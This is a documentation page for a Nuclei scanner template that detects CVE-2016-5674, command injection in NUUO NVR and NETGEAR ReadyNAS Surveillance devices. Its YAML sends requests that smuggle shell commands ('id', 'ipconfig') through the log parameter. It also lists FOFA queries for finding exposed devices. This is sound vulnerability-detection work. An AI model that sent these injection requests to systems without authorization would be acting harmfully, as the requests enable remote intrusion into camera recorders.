Skip to content
Nuclei Templates

NUUO NVR camera `debugging_center_utils_.php` - Command Execution

ID: CVE-2016-5674

Severity: critical

Author: DhiyaneshDK

Tags: cve,cve2016,nuuo,rce,netgear

Description

Section titled “Description”

debugging_center_utils_.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2016-5674


info:
  name: NUUO NVR camera `debugging_center_utils_.php` - Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    __debugging_center_utils___.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.
  reference:
    - http://www.kb.cert.org/vuls/id/856152
    - https://www.exploit-db.com/exploits/40200/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-5674
    cwe-id: CWE-20
    epss-score: 0.95793
    epss-percentile: 0.99431
    cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: netgear
    product: "readynas_surveillance"
    fofa-query:
      - "app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\""
      - app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login"
  tags: cve,cve2016,nuuo,rce,netgear
variables:
  rand: "{{to_lower(rand_text_alpha(32))}}"


http:
  - method: GET
    path:
      - "{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id"
      - "{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig"


    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "contains(body_1, 'Debugging Center')"
          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)"
        condition: and


      - type: dsl
        dsl:
          - "status_code_2 == 200"
          - "contains(body_2, 'Debugging Center')"
          - "contains(body_2, 'Windows IP')"
        condition: and
# digest: 490a004630440220763c856465f94c7b489687a0ed970a104c8507cbc9d51993a69f32744411bd7a02203852e6a2018f5178177de2200f60bda6e0c1de7a185b4b7b7fe75b1bd45c868d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-5674.yaml"

View on Github